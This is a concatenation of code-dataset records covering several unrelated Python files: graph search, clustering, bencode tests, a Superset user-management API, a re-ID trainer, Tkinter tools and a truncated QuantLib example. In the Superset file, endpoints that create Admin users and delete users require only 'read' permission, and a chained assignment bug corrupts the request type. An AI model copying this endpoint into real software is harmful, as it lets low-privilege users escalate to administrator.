costs[node]\n neighbors = graph[node]\n for n in neighbors.keys(): # 遍历当前节点的所有邻居\n new_cost = cost + neighbors[n]\n if costs[n] > new_cost: # 如果经当前节点前往该邻居更近,\n costs[n] = new_cost # 就更新该邻居的开销\n parents[n] = node # 同时将该邻居的父节点设置为当前节点\n\n processed.append(node) # 将当前节点标记为处理过\n node = fin_lowest_cost_node(costs) # 找出接下来要处理的节点,并循环\n\nlujing = []\nx = 'fin'\nwhile x:\n try:\n lujing.append(x)\n x = parents[x]\n except:\n break\n\n\nprint('最优路径为:', lujing[::-1])\nprint('最小开销为:', costs[\"fin\"])\n","sub_path":"算法/狄克斯特拉算法2.py","file_name":"狄克斯特拉算法2.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"276276021","text":"import numpy as np\nfrom sklearn import cluster, metrics\n\nimport csv, sys\n\n\ndef main():\n n_clusters = int(sys.argv[1]) if len(sys.argv) > 1 else 3\n trunc_misses = int(sys.argv[2]) if len(sys.argv) > 2 else 5\n\n # alg = cluster.AffinityPropagation()\n alg = cluster.KMeans(n_clusters=n_clusters, init=\"random\")\n # alg = cluster.DBSCAN(eps=7, min_samples=3)\n # alg = cluster.SpectralClustering(n_clusters=n_clusters)\n # alg = cluster.MeanShift(bandwidth=6.9)\n\n dump_groups(*make_groups(sys.stdin, alg), trunc_misses)\n\n\ndef dump_groups(groups, get_topics_in_common, trunc_misses=5):\n for group_name, trainees in groups.items():\n print_group(trainees, group_name, get_topics_in_common(trainees), trunc_misses)\n\n\ndef make_groups(stream, alg):\n reader = csv.reader(stream)\n names = []\n missed_topics = []\n\n keywords = reader.__next__()[1:]\n for row in reader:\n row = iter(row)\n names.append(row.__next__())\n missed_topics.append(\n [1 if cell == \"x\" else 0 for cell in row if cell == \"x\" or cell == \"\"]\n )\n\n features = np.array(missed_topics)\n\n clustering = alg.fit(features)\n labels = clustering.labels_\n\n groups = group(labels, names)\n\n def get_topics_in_common(trainees):\n d = {}\n\n for trainee in trainees:\n missed = missed_topics[names.index(trainee)]\n for i, was_missed in enumerate(missed):\n d.setdefault(i, []).append(was_missed)\n\n return [\n (keywords[i], list)\n for i, list in sorted(\n d.items(), key=lambda kv: (-1 * sum(kv[1]), keywords[kv[0]])\n )\n ]\n\n return groups, get_topics_in_common\n\n\ndef print_group(members, group_name, topic_misses=None, trunc_misses=5):\n print(\"## {}\\n\".format(group_name))\n\n for member in members:\n print(\"- {}\".format(member))\n\n if topic_misses is not None:\n print(\"\\n\\n### Topics in common\\n\")\n\n if trunc_misses is not None:\n topic_misses = topic_misses[:trunc_misses]\n\n for topic, misses in topic_misses:\n print(\n \"- **{}**: {} / {} missed (%{})\".format(\n topic,\n sum(misses),\n len(misses),\n round((sum(misses) / len(misses)) * 100),\n )\n )\n\n print(\"\\n\")\n\n\ndef group(labels, names):\n groups = {label: [] for label in set(labels)}\n for i, label in enumerate(labels):\n groups[label].append(names[i])\n\n groups = {\n \"Group {}\".format(i + 1): names\n for i, names in enumerate([names for label, names in groups.items()])\n }\n\n return groups\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"analysis/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"436486918","text":"import unittest\nfrom random import shuffle\n\nfrom torrent import *\nfrom hashlib import sha1, md5\n\n\nclass BencodeTest(unittest.TestCase):\n \"\"\"\n Unit Tests for the Bencode class\n \"\"\"\n\n def test_encode_string(self):\n string = Bencode.encode('hello world!')\n self.assertEqual(string, b'12:hello world!')\n string = Bencode.encode('')\n self.assertEqual(string, b'0:')\n string = Bencode.encode('Cyber')\n self.assertEqual(string, b'5:Cyber')\n\n def test_decode_string(self):\n string = Bencode.decode(b'12:hello world!')\n self.assertEqual(string, 'hello world!')\n string = Bencode.decode(b'0:')\n self.assertEqual(string, '')\n string = Bencode.decode(b'5:Cyber')\n self.assertEqual(string, 'Cyber')\n\n def test_encode_int(self):\n integer = Bencode.encode(13)\n self.assertEqual(integer, b'i13e')\n integer = Bencode.encode(-1523)\n self.assertEqual(integer, b'i-1523e')\n integer = Bencode.encode(0)\n self.assertEqual(integer, b'i0e')\n\n def test_decode_int(self):\n integer = Bencode.decode(b'i13e')\n self.assertEqual(integer, 13)\n integer = Bencode.decode(b'i-1523e')\n self.assertEqual(integer, -1523)\n integer = Bencode.decode(b'i0e')\n self.assertEqual(integer, 0)\n\n def test_encode_list(self):\n lst = Bencode.encode(['hello world!', 13])\n self.assertEqual(lst, b'l12:hello world!i13ee')\n lst = Bencode.encode([])\n self.assertEqual(lst, b'le')\n lst = Bencode.encode(['Cyber', -1523])\n self.assertEqual(lst, b'l5:Cyberi-1523ee')\n\n def test_decode_list(self):\n lst = Bencode.decode(b'l12:hello world!i13ee')\n self.assertListEqual(lst, ['hello world!', 13])\n lst = Bencode.decode(b'le')\n self.assertListEqual(lst, [])\n lst = Bencode.decode(b'l5:Cyberi-1523ee')\n self.assertListEqual(lst, ['Cyber', -1523])\n\n def test_encode_dict(self):\n d = Bencode.encode({'hello world!': 13, 'Cyber': [-1523, ''], '13': {}})\n self.assertEqual(d, b'd2:13de5:Cyberli-1523e0:e12:hello world!i13ee')\n d = Bencode.encode({})\n self.assertEqual(d, b'de')\n\n def test_decode_dict(self):\n d = Bencode.decode(b'd2:13de5:Cyberli-1523e0:e12:hello world!i13ee')\n self.assertDictEqual(d, {'hello world!': 13, 'Cyber': [-1523, ''], '13': {}})\n d = Bencode.decode(b'de')\n self.assertDictEqual(d, {})\n\n\nclass BitfieldTest(unittest.TestCase):\n \"\"\"\n Unit Tests for the bitfield class\n \"\"\"\n\n def test_length(self):\n bitfield = BitField(8)\n self.assertEqual(len(bitfield), 1)\n bitfield = BitField(250)\n self.assertEqual(len(bitfield), 32)\n\n def test_addition(self):\n bitfield = BitField(15)\n bitfield += 14\n self.assertEqual(int.from_bytes(bitfield, 'big'), 0x0002)\n bitfield += 1\n self.assertEqual(int.from_bytes(bitfield, 'big'), 0x4002)\n bitfield += 0\n self.assertEqual(int.from_bytes(bitfield, 'big'), 0xC002)\n\n\nclass PieceTest(unittest.TestCase):\n def setUp(self):\n self.piece = Piece(7, sha1(b'Torrent').digest())\n\n def test_addition(self):\n sliced = [(0, b'To'), (2, b'rr'), (4, b'ent')]\n shuffle(sliced)\n while sliced:\n self.piece += sliced.pop()\n self.assertTrue(self.piece)\n\n\nunittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183240439","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nimport logging\n#import json\n\nfrom flask import Response, request\nfrom flask_appbuilder import expose\nfrom flask_appbuilder.api import BaseApi, safe\nfrom flask_appbuilder.security.decorators import permission_name, protect\nfrom flask_appbuilder.security.sqla.models import PermissionView\nfrom flask_wtf.csrf import generate_csrf\n\nfrom superset import security_manager as sm\nfrom superset.extensions import event_logger\n\nlogger = logging.getLogger(__name__)\n\nclass SecurityRestApi(BaseApi):\n resource_name = \"security\"\n allow_browser_login = True\n openapi_spec_tag = \"Security\"\n\n @expose(\"/csrf_token/\", methods=[\"GET\"])\n @event_logger.log_this\n @protect()\n @safe\n @permission_name(\"read\")\n def csrf_token(self) -> Response:\n \"\"\"\n Return the csrf token\n ---\n get:\n description: >-\n Fetch the CSRF token\n responses:\n 200:\n description: Result contains the CSRF token\n content:\n application/json:\n schema:\n type: object\n properties:\n result:\n type: string\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n return self.response(200, result=generate_csrf())\n\n def custom_pvm_check(self, pvm: PermissionView, perm_name: str) -> bool:\n return str(pvm) == perm_name\n\n \n def create_role(self, role_name, datasourceIds, datasourceNames, isUser) -> None:\n pns = []\n for idx, id in enumerate(datasourceIds):\n pns.append('datasource access on [Tracking].[' + datasourceNames[idx] + '](id:' + id + ')')\n\n if isUser:\n pns.append('can write on Dataset')\n pns.append('can read on Dataset')\n pns.append('menu access on Dataset')\n pns.append('can save on Datasource')\n\n role = sm.add_role(role_name)\n pvms = sm.get_session.query(PermissionView).all()\n\n role.permissions = []\n for permission_view in pvms:\n for perm_name in pns:\n if self.custom_pvm_check(permission_view, perm_name):\n role.permissions.append(permission_view)\n break\n\n sm.get_session.merge(role)\n sm.get_session.commit()\n\n\n @expose(\"/create_ta_user/\", methods=[\"POST\"])\n @event_logger.log_this\n @protect()\n @safe\n @permission_name(\"read\")\n def ta_user_creation(self) -> Response:\n \"\"\"\n Return the csrf token\n ---\n get:\n description: >-\n Fetch the CSRF token\n responses:\n 200:\n description: Result contains the CSRF token\n content:\n application/json:\n schema:\n type: object\n properties:\n result:\n type: string\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n data = request.json\n role_name = ''\n\n # admin, user, sub\n if data['type'] == 'admin':\n role_name = 'Admin'\n elif data['type'] == 'user':\n role_name = data['key']\n elif data['type'] == 'sub':\n role_name = data['key'] + '_sub'\n\n role = sm.find_role(role_name)\n\n if role is None:\n datasourceIds = data['datasourceIds'].split(',')\n datasourceNames = data['datasourceNames'].split(',')\n isUser = data['type'] = 'user'\n self.create_role(role_name, datasourceIds, datasourceNames, isUser)\n \n role_names = [role_name]\n if role_name != 'Admin':\n role_names.append('Gamma')\n\n user = sm.add_user(data['username'], 'DS2G', \"User\", data['email'], list(map(lambda rn:sm.find_role(rn), role_names)), password=data['password'])\n sm.get_session.commit()\n return self.response(200, id=user.id)\n\n @expose(\"/delete_ta_user/\", methods=[\"POST\"]) #DELETE\n @event_logger.log_this\n @protect()\n @safe\n @permission_name(\"read\")\n def ta_user_deletion(self) -> Response:\n \"\"\"\n Return the csrf token\n ---\n get:\n description: >-\n Fetch the CSRF token\n responses:\n 200:\n description: Result contains the CSRF token\n content:\n application/json:\n schema:\n type: object\n properties:\n result:\n type: string\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n data = request.json\n user = sm.find_user(data['username'])\n\n if user is not None:\n try:\n sm.get_session.delete(user)\n sm.get_session.commit()\n except SQLAlchemyError as ex: # pragma: no cover\n sm.get_session.rollback()\n raise DAODeleteFailedError(exception=ex)\n\n return self.response(200)","sub_path":"superset/security/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"489761206","text":"# # By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\r\n# # What is the 10 001st prime number?\r\n\r\nimport math\r\ndef isprime(num):\r\n for i in range(3, math.floor(math.sqrt(num)) + 1, 2):\r\n if num % i == 0:\r\n return False\r\n return True\r\n\r\nn = 1\r\ncount = 1\r\nwhile(count != 10001):\r\n n += 2\r\n if isprime(n):\r\n count += 1\r\nprint(n)\r\n","sub_path":"Solutions/problem_7.py","file_name":"problem_7.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349802524","text":"import time\nimport numpy as np\nimport torch\nfrom .utils.meters import AverageMeter\nfrom .utils.plot_figures import utils_for_fig3\nfrom .utils.mlp_statistics import precision_recall\nfrom .loss import CTAM_SSCL_Loss\nfrom .onlinesamplemining import DSM,KNN,SS\nimport pdb\ndevice_0 = torch.device('cuda:0')\ndevice_1 = torch.device('cuda:1')\ndevice_cpu = torch.device('cpu')\n\nclass Trainer(object):\n def __init__(self, cfg, model, memory,use_dram=False):\n super(Trainer, self).__init__()\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.model = model\n self.memory = memory\n self.use_dram = use_dram\n self.eval_mlp = True\n self.ldb = cfg.SSCL.L\n self.thr = cfg.SSCL.T\n\n self.criterion = CTAM_SSCL_Loss(temperature=cfg.SSCL.TEMP, base_temperature=cfg.SSCL.BTEMP,contrast_mode=cfg.SSCL.MODE).to(self.device)\n\n\n\n def train(self, epoch, data_loader, optimizer,writer,gi=True, print_freq=1):\n self.model.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n end = time.time()\n\n\n\n if gi==True and epoch==0:\n print('Memory Re-initisliation')\n with torch.no_grad():\n for i, inputs in enumerate(data_loader):\n inputs,camid,tid,pids = self._parse_data(inputs)\n outputs = self.model(inputs, 'l2feat')\n self.memory.store(outputs,camid,tid,pids)\n #self.graph.global_normalisation()\n\n print('Done!')\n \n\n if epoch % 5 == 0 and epoch != 0:\n print('Look-up table Overhaul - [reinitialising]')\n with torch.no_grad():\n for i, inputs in enumerate(data_loader):\n inputs,camid,tid, pids = self._parse_data(inputs)\n outputs = self.model(inputs, 'l2feat')\n self.memory.store(outputs,camid,tid,pids)\n print('[Reinitilisaing] Overhaul (%.3f %%) is finished'%(i/len(data_loader)*100.0))\n #self.graph.global_normalisation()\n print('Dictionary overhaul is finished. - Overhaul (100%%) is finished')\n\n \n precision = 0.0\n recall = 0.0\n _num_positive = 0\n\n\n\n for i, inputs in enumerate(data_loader):\n if i!=0 and i%500==0:\n print('VGA Cooling for 120 secs')\n time.sleep(120)\n\n data_time.update(time.time() - end)\n inputs,camid,tid,pids = self._parse_data_v2(inputs)\n camid = camid.to(device_1)\n tid = tid.to(device_1)\n outputs = self.model(inputs, 'l2feat') #output = feature batch of input images\n #Batch output - so start on this section\n logits = self.memory(outputs, pids,epoch=epoch)\n if epoch > 5:\n #Local + global contrastive learnings\n #local_loss,_hard_pos = self.criterion(self.memory,logits,camid,hard_pos=None,trackids=tid,type='local')\n #global_loss,_tmp_pos = self.criterion(self.memory,logits,camid,hard_pos=_hard_pos,trackids=tid,type='cl',thr=self.thr)\n cl_loss,_ttt = self.criterion(self.memory,logits,camid,hard_pos=None,trackids=tid,type='cl')\n cam_kl_loss = self.criterion(self.memory,outputs.to(device_1),camid,hard_pos=None,type='cam')\n loss = cl_loss +self.ldb*cam_kl_loss\n #loss = local_loss + global_loss\n\n else:\n loss,_ = self.criterion(self.memory,logits,camid,trackids=tid,type='local')\n\n\n losses.update(loss.item(), outputs.size(0))\n writer.add_scalar(\"Loss/train\", loss.item(), epoch * len(data_loader)+i)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n batch_time.update(time.time() - end)\n end = time.time()\n\n if (i + 1) % print_freq == 0:\n log = \"Epoch: [{}][{}/{}], Time {:.3f} ({:.3f}), Data {:.3f} ({:.3f}), Loss {:.3f} ({:.3f}) \" \\\n .format(epoch, i + 1, len(data_loader),\n batch_time.val, batch_time.avg,\n data_time.val, data_time.avg,\n losses.val, losses.avg)\n print(log)\n torch.cuda.empty_cache()\n if epoch > 5:\n plog = \"[Epoch {}]Average # of positive {} Prediction {:.3f} Recall {:.3f}\".format(epoch, _num_positive/len(data_loader),precision/len(data_loader), recall/len(data_loader))\n print(plog)\n\n\n def _parse_data(self, inputs):\n imgs, _t1, camid,tid,pids = inputs #img, fname,camid, pid, idx\n inputs = imgs.to(self.device)\n pids = pids.to(self.device)\n #print(_t1)\n #print(_t2)\n return inputs,camid,tid, pids\n\n def _parse_data_v2(self, inputs):\n imgs, _t1,camid,tid, pids = inputs #img, fname,camid, pid, idx\n inputs = imgs.to(self.device)\n pids = pids.to(self.device)\n #print(_t1)\n #print(_t2)\n return inputs,camid,tid,pids\n","sub_path":"lib/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"403715004","text":"import os\nfrom tkinter import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom joblib import dump, load\nfrom tensorflow import keras\n\nFILENAME = \"Show.png\"\npca = load(os.path.join(os.curdir, \"Config\", 'Trained .joblib'))\n\nsliders = []\nmins = []\nmaxs = []\nk = []\n\nrow = 1\ncol = 1\ncol_count = 3\nrun = False\n\ndef lol():\n pass\nconfig_dir = os.path.join(os.curdir, \"Config\")\n\nautoencoder = keras.models.load_model(os.path.join(config_dir, \"Best Model.h5\"), custom_objects={\"rounded_accuracy\":lol})\ndecoder = autoencoder.layers[1]\n\n\ndef init():\n global mins, maxs\n with open(os.path.join(config_dir, \"Max.txt\"), \"r\") as max:\n with open(os.path.join(config_dir, \"Min.txt\"), \"r\") as min:\n\n for lin in max.readlines():\n maxs.append(float(lin))\n\n for lin in min.readlines():\n mins.append(float(lin))\n\n\ndef show_img():\n global FILENAME, sliders, pca\n img = []\n for index in range(len(sliders)):\n img.append(sliders[index].get()/10 * (maxs[index] - mins[index]))\n\n img = pca.inverse_transform([img])\n img = decoder.predict(img).reshape((64, 64, 3))\n\n\n plt.imshow(img)\n plt.show()\n\n\nclass SliderWindows:\n def __init__(self, master):\n global row, col\n self.master = master\n self.windows = []\n self.app = 0\n\n if col_count % 2 == 0:\n self.button = Button(master, text='Show Image', command=show_img).grid(row=0,\n column=int(col_count / 2))\n else:\n self.button = Button(master, text='Show Image', command=show_img).grid(row=0,\n column=int(col_count / 2) + 1)\n\n for x in range(33):\n w = Scale(master, from_=-10, to=10, length=None, orient=HORIZONTAL)\n w.grid(row=row, column=col)\n sliders.append(w)\n\n if col == col_count:\n col = 0\n row += 1\n col += 1\n\n\ndef main():\n root = Tk()\n root.title(\"GUI\")\n init()\n\n app = SliderWindows(root)\n\n root.mainloop()\n\n\nmain()\n","sub_path":"GUI/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111993723","text":"import requests\n\n\ndef test_knowledge_grounding():\n url = \"http://0.0.0.0:8083/respond\"\n\n checked_sentence1 = (\n \"When Mabel visited their home to play the piano, \"\n \"she occasionally glimpsed a flitting swirl of white in the next room, \"\n \"sometimes even received a note of thanks for calling, but she never actually \"\n \"spoke with the reclusive, almost spectral Emily.\"\n )\n knowledge1 = (\n \"The real-life soap opera behind the publication of Emily Dickinson’s poems\\n\"\n \"When Mabel visited their home to play the piano, she occasionally glimpsed \"\n \"a flitting swirl of white in the next room, sometimes even received a note of \"\n \"thanks for calling, but she never actually spoke with the reclusive, almost spectral Emily.\"\n )\n text1 = \"Yeah she was an icon she died in 1886 at the tender age of 55.\"\n\n checked_sentence2 = \"Penguins are a group of aquatic flightless birds.\"\n knowledge2 = \"Penguins are a group of aquatic flightless birds.\"\n text2 = \"Who are penguins?\"\n\n history = (\n \"Do you know who Emily Dickson is?\\n\"\n 'Emily Dickinson? The poet? I do! \"Tell all the truth, but tell it slant\" '\n \"she once said. Do you like her poetry?\"\n )\n\n request_data = {\n \"batch\": [\n {\"checked_sentence\": checked_sentence1, \"knowledge\": knowledge1, \"text\": text1, \"history\": history},\n {\"checked_sentence\": checked_sentence2, \"knowledge\": knowledge2, \"text\": text2, \"history\": history},\n ]\n }\n results = requests.post(url, json=request_data).json()\n assert all(results), f\"Got empty string among results\"\n print(\"Got\\n{}\\nSuccess\".format(results))\n\n\nif __name__ == \"__main__\":\n test_knowledge_grounding()\n","sub_path":"services/knowledge_grounding/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"405312201","text":"#coding = utf-8\n\nimport re\nimport tkinter\nimport requests\nimport xlwt\nimport time\nimport logging\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter import messagebox\nfrom tkinter import filedialog\nfrom concurrent.futures import ThreadPoolExecutor, wait\n\n\nclass CardInfo(object):\n\n def __init__(self):\n self.root = tkinter.Tk()\n self.root.title(\"泸州社保卡制卡查询(测试版1.1) 作者:yangyi\")\n self.root.resizable(0,0)\n self.root.minsize(1200,600)\n logging.basicConfig(filename='log.log', level=logging.DEBUG)\n logging.info('Init...')\n\n self.frame1 = tkinter.LabelFrame(self.root,\n padx=10, pady=10,\n text='输入身份证号码',\n font=(\"Arial, 15\"),\n width=250,\n height=600)\n self.frame1.grid(row=0, column=0)\n self.frame2 = tkinter.LabelFrame(self.root,\n padx=10, pady=10,\n text='身份证号码',\n font=(\"Arial, 15\"),\n width=250,\n height=600)\n self.frame2.grid(row=0, column=1)\n self.frame3 = tkinter.LabelFrame(self.root,\n padx=10, pady=10,\n text='社保卡信息',\n font=(\"Arial, 15\"),\n width=700,\n height=600)\n self.frame3.grid(row=0, column=2)\n\n self.inputText1 = ScrolledText(self.frame1, width=30, height=42)\n self.inputText2 = ScrolledText(self.frame2, width=30, height=42, state='disabled')\n self.inputText3 = ScrolledText(self.frame3, width=95, height=42, state='disabled')\n self.inputText1.grid(row=0, column=0)\n self.inputText2.grid(row=0, column=0)\n self.inputText3.grid(row=0, column=0)\n\n self.inputButton1 = tkinter.Button(self.frame1, text=\"导入\", font=(\"Arial, 15\"), command=self.input)\n self.inputButton2 = tkinter.Button(self.frame2, text=\"查询\", font=(\"Arial, 15\"), state='disabled', command=self.search)\n self.inputButton3 = tkinter.Button(self.frame3, text=\"导出\", font=(\"Arial, 15\"), state='disabled', command=self.output)\n self.inputButton1.grid(row=1, column=0)\n self.inputButton2.grid(row=1, column=0)\n self.inputButton3.grid(row=1, column=0)\n\n self.url = 'http://10.162.0.174:7777/servlet/CardServlet'\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n\n # 点击导入按钮函数\n def input(self):\n cards = self.inputText1.get('0.0', tkinter.END)\n self.cardsList = []\n #根据长度判断是否身份证号码\n for val in cards.split():\n if val.isalnum() and len(val) == 18:\n self.cardsList.append(val)\n\n #将识别的身份证号码填入第二个框中\n if (self.cardsList):\n self.inputButton2['state'] = tkinter.NORMAL\n else:\n self.inputButton2['state'] = tkinter.DISABLED\n self.inputText2['state'] = tkinter.NORMAL\n self.inputText2.delete('0.0', tkinter.END) #全清空\n for index, item in enumerate(self.cardsList):\n self.inputText2.insert(tkinter.END, item + '\\n')\n\n self.inputText2['state'] = tkinter.DISABLED\n\n # 点击查询按钮函数\n def search(self):\n self.inputButton2['state'] = tkinter.DISABLED\n if not self.checkNet():\n messagebox.showerror('网络链接错误', '请检查网络链接,本程序需要连接内网或者外网')\n return\n t1 = time.clock()\n self.threadPool = ThreadPoolExecutor(max_workers=7)\n futures = []\n self.cardResult = []\n for cardNum in self.cardsList:\n futures.append(self.threadPool.submit(self.getCardInfo, cardNum))\n wait(futures)\n\n for cardFuture in futures:\n cardInfo = cardFuture.result()\n self.cardResult.append(cardInfo)\n print(time.clock() - t1)\n\n #在第三个文本框中显示查询结果\n self.inputText3['state'] = tkinter.NORMAL\n self.inputText3.delete('0.0', tkinter.END)\n self.inputText3.insert('0.0', '身份证号码\\t社保卡状态\\t银行网点\\t网点地址\\t网点电话\\n')\n for cardInfo in self.cardResult:\n if cardInfo.__contains__('bank'):\n self.inputText3.insert(tkinter.END, cardInfo['id'] + '\\t' + cardInfo['status'] + '\\t' + cardInfo['bank'] + '\\t' + cardInfo['address'] + '\\t' + cardInfo['tel'] + '\\n')\n else:\n self.inputText3.insert(tkinter.END, cardInfo['id'] + '\\t' + cardInfo['status'] + '\\n')\n self.inputText3['state'] = tkinter.DISABLED\n if self.cardsList:\n self.inputButton2['state'] = tkinter.NORMAL\n if self.cardResult:\n self.inputButton3['state'] = tkinter.NORMAL\n else:\n self.inputButton3['state'] = tkinter.DISABLED\n messagebox.showinfo('查询结束', \"查询结束,但由于网络原因,结果可能不准确,请将结果为:未制卡、网络错误的人员身份证再次输入程序进行查询,确保结果正确\")\n\n # 点击导出按钮函数\n def output(self):\n self.inputButton3['state'] = tkinter.DISABLED\n workBook = xlwt.Workbook()\n sheet1 = workBook.add_sheet('社保卡查询结果')\n sheet1.write(0, 0, '身份证号码')\n sheet1.write(0, 1, '社保卡状态')\n sheet1.write(0, 2, '领卡网点')\n sheet1.write(0, 3, '网点地址')\n sheet1.write(0, 4, '网点电话')\n\n for index, cardInfo in enumerate(self.cardResult):\n sheet1.write(index + 1, 0, cardInfo['id'])\n sheet1.write(index + 1, 1, cardInfo['status'])\n if cardInfo.__contains__('bank'):\n sheet1.write(index + 1, 2, cardInfo['bank'])\n sheet1.write(index + 1, 3, cardInfo['address'])\n sheet1.write(index + 1, 4, cardInfo['tel'])\n\n path = filedialog.asksaveasfilename()\n if path:\n workBook.save(path + '.xls')\n\n if self.cardResult:\n self.inputButton3['state'] = tkinter.NORMAL\n\n # 测试网络环境为内网还是外网\n def checkNet(self):\n try:\n requests.get('http://10.162.0.174:7777/search.jsp?method=000', headers=self.headers, timeout=2)\n except BaseException:\n self.url = 'http://182.130.246.34:8881/servlet/CardServlet'\n try:\n requests.get('http://182.130.246.34:8881/search.jsp?method=000', headers=self.headers, timeout=2)\n except BaseException as e:\n logging.exception(e)\n return False\n return True;\n\n def getCardInfo(self, cardNum):\n\n param = {\n 'card': cardNum,\n 'method': '000'\n }\n try:\n response = requests.post(self.url, headers=self.headers, data=param, timeout=2)\n result = {}\n result['id'] = cardNum\n if '提示' in response.text:\n result['status'] = '该人员还未办理社保卡,请尽快到社区或银行网点办理!'\n else:\n result['status'] = re.findall(r'社保卡状态(.+?)', response.text)[0]\n result['bank'] = re.findall(r'领卡网点(.+?)', response.text)[0]\n result['address'] = re.findall(r'网点地址(.+?)', response.text)[0]\n result['tel'] = re.findall(r'网点电话(.+?)', response.text)[0]\n return result;\n except BaseException as e:\n logging.exception(e)\n result = {}\n result['id'] = cardNum\n result['status'] = '网络状态不好,请重新查询'\n return result\n\ndef main():\n CI = CardInfo()\n try:\n tkinter.mainloop()\n except BaseException as e:\n logging.exception(e)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"social_card/main_current.py","file_name":"main_current.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"277824569","text":"import QuantLib as ql\r\n\r\n# global data\r\ntodaysDate = ql.Date(15, ql.May, 1998)\r\nql.Settings.instance().evaluationDate = todaysDate\r\nsettlementDate = ql.Date(17, ql.May, 1998)\r\nriskFreeRate = ql.FlatForward(settlementDate, 0.05, ql.Actual365Fixed())\r\n\r\n# option parameters\r\nexercise = ql.EuropeanExercise(ql.Date(17, ql.May, 1999))\r\npayoff = ql.PlainVanillaPayoff(ql.Option.Call, 8.0)\r\n\r\n# market data\r\nunderlying = ql.SimpleQuote(7.0)\r\nvolatility = ql.BlackConstantVol(settlementDate, ql.TARGET(), 0.10, ql.Actual365Fixed())\r\ndividendYield = ql.FlatForward(settlementDate, 0.05, ql.Actual365Fixed())\r\n\r\n# report\r\nheader = \" |\".join([\"%17s\" % tag for tag in [\"method\", \"value\", \"estimated error\", \"actual error\"]])\r\nprint(\"\")\r\nprint(header)\r\nprint(\"-\" * len(header))\r\n\r\nrefValue = None\r\n\r\n\r\ndef report(method, x, dx=None):\r\n e = \"%.4f\" % abs(x - refValue)\r\n x = \"%.5f\" % x\r\n if dx:\r\n dx = \"%.4f\" % dx\r\n else:\r\n dx = \"n/a\"\r\n print(\" |\".join([\"%17s\" % y for y in [method, x, dx, e]]))\r\n\r\n\r\n# good to go\r\n\r\nprocess = ql.BlackScholesMertonProcess(\r\n ql.QuoteHandle(underlying),\r\n ql.YieldTermStructureHandle(dividendYield),\r\n ql.YieldTermStructureHandle(riskFreeRate),\r\n ql.BlackVolTermStructureHandle(volatility),\r\n)\r\n\r\nhestonProcess = ql.HestonProcess(\r\n ql.YieldTermStructureHandle(riskFreeRate),\r\n ql.YieldTermStructureHandle(dividendYield),\r\n ql.QuoteHandle(underlying),\r\n 0.1 * 0.1,\r\n 1.0,\r\n 0.1 * 0.1,\r\n 0.0001,\r\n 0.0,\r\n)\r\nhestonModel = ql.HestonModel(hestonProcess)\r\n\r\noption = ql.VanillaOption(payoff, exercise)\r\n\r\n# method: analytic\r\noption.setPricingEngine(ql.AnalyticEuropeanEngine(process))\r\nvalue = option.NPV()\r\nrefValue = value\r\nreport(\"analytic\", value)\r\n\r\n# method: Heston semi-analytic\r\noption.setPricingEngine(ql.AnalyticHestonEngine(hestonModel))\r\nreport(\"Heston analytic\", option.NPV())\r\n\r\n# method: Heston COS method\r\noption.setPricingEngine(ql.COSHestonEngine(hestonModel))\r\nreport(\"Heston COS Method\", option.NPV())\r\n\r\n# method: integral\r\noption.setPricingEngine(ql.IntegralEngine(process))\r\nreport(\"integral\", option.NPV())\r\n\r\n# method: finite differences\r\ntimeSteps = 801\r\ngridPoints = 800\r\n\r\noption.setPricingEngine(ql.FDEuropeanEngine(process, timeSteps, gridPoints))\r\nreport(\"finite diff.\", option.NPV())\r\n\r\n# method: binomial\r\ntimeSteps = 801\r\n\r\noption.setPricingEngine(ql.BinomialVanillaEngine(process, \"JR\", timeSteps))\r\nreport(\"binomial (JR)\", 